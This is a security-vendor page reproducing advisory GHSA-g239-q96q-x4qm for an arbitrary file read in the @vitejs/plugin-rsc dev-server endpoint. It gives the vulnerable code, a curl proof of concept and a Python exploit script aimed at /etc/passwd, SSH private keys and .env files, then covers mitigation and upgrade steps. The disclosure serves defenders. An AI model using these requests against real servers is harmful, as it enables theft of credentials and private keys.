Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-g239-q96q-x4qm

HIGH

@vitejs/plugin-rsc has an Arbitrary File Read via `/__vite_rsc_findSourceMapURL` Endpoint

Also known asCVE-2025-68155
Published
Dec 16, 2025
Updated
Dec 16, 2025
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.6%probability of exploitation in next 30 days
Lower Risk42th percentile-0.63%
0.00%0.56%1.12%1.68%0.3%0.6%Jan 26Apr 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
📦@vitejs/plugin-rsc

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.

Description

Summary

The /__vite_rsc_findSourceMapURL endpoint in @vitejs/plugin-rsc allows unauthenticated arbitrary file read during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a file:// URL in the filename query parameter.

Severity: High Attack Vector: Network
Privileges Required: None
Scope: Development mode only (vite dev)

Impact

Who Is Affected?

  • All developers using @vitejs/plugin-rsc during development
  • Projects running vite dev with the RSC plugin enabled

Attack Scenarios

  1. Network-Exposed Dev Servers:
    When developers run vite --host 0.0.0.0 (common for mobile testing), attackers on the same network can read files.

  2. XSS-Based Attacks: If the application has an XSS vulnerability, malicious JavaScript can fetch sensitive files and exfiltrate them.

  3. ~Malicious Dependencies: ~ A compromised npm package could include code that reads files during development.

  4. DNS Rebinding: (EDIT: This doesn't apply since https://github.com/vitejs/vite/pull/20222) An attacker could use DNS rebinding to access the localhost dev server from a malicious website.

What Can Be Leaked?

  • Environment files (.env, .env.local, .env.production)
  • SSH keys (~/.ssh/id_rsa, ~/.ssh/id_ed25519)
  • Cloud credentials (~/.aws/credentials, ~/.config/gcloud/)
  • Database passwords and API keys
  • Source code from other projects
  • System files (/etc/passwd, /etc/shadow if readable)

Details

Vulnerable Code Location

File: packages/plugin-rsc/src/plugins/find-source-map-url.ts
Lines: 49-61

The vulnerability exists in the findSourceMapURL function:

async function findSourceMapURL(
  server: ViteDevServer,
  filename: string,
  environmentName: string,
): Promise<object | undefined> {
  // this is likely server external (i.e. outside of Vite processing)
  if (filename.startsWith('file://')) {
    filename = fileURLToPath(filename)
    if (fs.existsSync(filename)) {
      // line-by-line identity source map
      const content = fs.readFileSync(filename, 'utf-8')  // ← ARBITRARY FILE READ
      return {
        version: 3,
        sources: [filename],
        sourcesContent: [content],  // ← FILE CONTENTS LEAKED HERE
        mappings: 'AAAA' + ';AACA'.repeat(content.split('\n').length),
      }
    }
    return
  }
  // ... rest of the function
}

Root Cause

The endpoint:

  1. Accepts a user-controlled filename parameter from the query string (line 20)
  2. Checks if it starts with file:// (line 49)
  3. Converts it to a filesystem path using fileURLToPath() (line 50)
  4. Reads the file with fs.readFileSync() without any path validation (line 53)
  5. Returns the file contents in the JSON response (line 57)

No validation is performed to ensure the requested file is within the project directory or is a legitimate source file.

PoC

Quick Test (Single Command)

If you have a Vite dev server running with @vitejs/plugin-rsc, you can test immediately:

curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'

Expected output (file contents in sourcesContent):

{
  "version": 3,
  "sources": ["/etc/passwd"],
  "sourcesContent": ["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/sbin:..."],
  "mappings": "AAAA;AACA;AACA;..."
}
<details><summary>Further details of PoC</summary>

Complete PoC with Docker

For a fully reproducible environment, I've prepared a complete PoC:

Step 1: Create a minimal vite.config.ts

import { defineConfig } from 'vite'
import react from '@vitejs/plugin-rsc'

export default defineConfig({
  plugins: [
    react({
      serverHandler: false,
    }),
  ],
})

Step 2: Create package.json

{
  "name": "poc-vite-rsc-file-read",
  "version": "1.0.0",
  "private": true,
  "type": "module",
  "scripts": {
    "dev": "vite --host 0.0.0.0"
  },
  "dependencies": {
    "react": "^19.0.0",
    "react-dom": "^19.0.0"
  },
  "devDependencies": {
    "@vitejs/plugin-rsc": "latest",
    "vite": "^6.0.0"
  }
}

Step 3: Create minimal index.html and src/main.tsx

index.html:

<!DOCTYPE html>
<html>
  <body>
    <div id="root"></div>
    <script type="module" src="/src/main.tsx"></script>
  </body>
</html>

src/main.tsx:

import React from 'react'
import ReactDOM from 'react-dom/client'
ReactDOM.createRoot(document.getElementById('root')!).render(<div>PoC</div>)

Step 4: Start the server and exploit

# Install and start
pnpm install
pnpm dev

# In another terminal, exploit:
curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'

Python Exploit Script

For easier testing, here's a Python script:

#!/usr/bin/env python3
"""Exploit: Arbitrary File Read via /__vite_rsc_findSourceMapURL"""

import json
import sys
import urllib.request
import urllib.parse

def read_file(host, port, file_path):
    """Read a file from the target server via the vulnerability."""
    url = f"http://{host}:{port}/__vite_rsc_findSourceMapURL"
    params = urllib.parse.urlencode({
        'filename': f'file://{file_path}',
        'environmentName': 'Server'
    })
    
    try:
        with urllib.request.urlopen(f"{url}?{params}", timeout=10) as response:
            data = json.loads(response.read().decode('utf-8'))
            if 'sourcesContent' in data and data['sourcesContent']:
                return data['sourcesContent'][0]
    except Exception as e:
        return f"Error: {e}"
    return None

if __name__ == '__main__':
    host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
    port = sys.argv[2] if len(sys.argv) > 2 else '5173'
    file_path = sys.argv[3] if len(sys.argv) > 3 else '/etc/passwd'
    
    content = read_file(host, port, file_path)
    if content:
        print(f"[+] Successfully read {file_path}:")
        print("-" * 60)
        print(content)
        print("-" * 60)
    else:
        print(f"[-] Failed to read {file_path}")

Usage:

python3 exploit.py localhost 5173 /etc/passwd
python3 exploit.py localhost 5173 /root/.ssh/id_rsa
python3 exploit.py localhost 5173 /home/user/.env

Verified Exploitation Results

I tested this in a Docker container and successfully read:

FileDescription
/etc/passwdSystem user accounts
/etc/hostsNetwork configuration
/root/.env.secretEnvironment secrets
/root/.ssh/id_rsaSSH private keys
/proc/self/environProcess environment variables
Source code filesAny file in the filesystem

Example output from /etc/passwd:

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh

Example output from sensitive secrets file:

SECRET_API_KEY=sk-live-very-secret-key-12345
DB_PASSWORD=super_secret_password
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
</details>

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npm@vitejs/plugin-rscall versions0.5.8

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @vitejs/plugin-rsc. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update @vitejs/plugin-rsc to 0.5.8 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-g239-q96q-x4qm is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-g239-q96q-x4qm is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-g239-q96q-x4qm. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary The `/__vite_rsc_findSourceMapURL` endpoint in `@vitejs/plugin-rsc` allows **unauthenticated arbitrary file read** during development mode. An attacker can read any file accessible to the Node.js process by sending a crafted HTTP request with a `file://` URL in the `filename` query parameter. **Severity:** High **Attack Vector:** Network **Privileges Required:** None **Scope:** Development mode only (`vite dev`) --- ## Impact ### Who Is Affected? - **All developers** using `@vitejs/plugin-rsc` during development - Projects running `vite dev` with the RSC plugin enabled ##
O3 Security · Impact-Aware SCA

Is GHSA-g239-q96q-x4qm in your dependencies?

O3 detects GHSA-g239-q96q-x4qm across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works